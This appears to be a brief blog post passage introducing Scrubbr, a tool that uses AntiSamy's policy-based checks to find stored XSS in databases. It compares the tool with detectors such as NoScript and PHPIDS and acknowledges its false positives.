There are numerous tools out that *detect* XSS attacks in different contexts better than AntiSamy. The most prominent and peer-reviewed are NoScript ( and PHPIDS ( However, detection is not strictly what AntiSamy does. AntiSamy checks if rich input that is passed in is allowed according to a policy file. Chances are that there is some input in your database that looks like rich input how we in the web world think about it, but actually isn’t.

With all of that being said, AntiSamy does an excellent job in most situations and will still detect the vast majority of stored XSS attacks, depending on the injection context.

So, hopefully in the future we can hook it up to a more appropriate engine like the PHPIDS ruleset. We will strive to make it produce less false positives in the future. However, regardless of the false positives I think we are a lot better off today than we were yesterday, so go download Scrubbr now!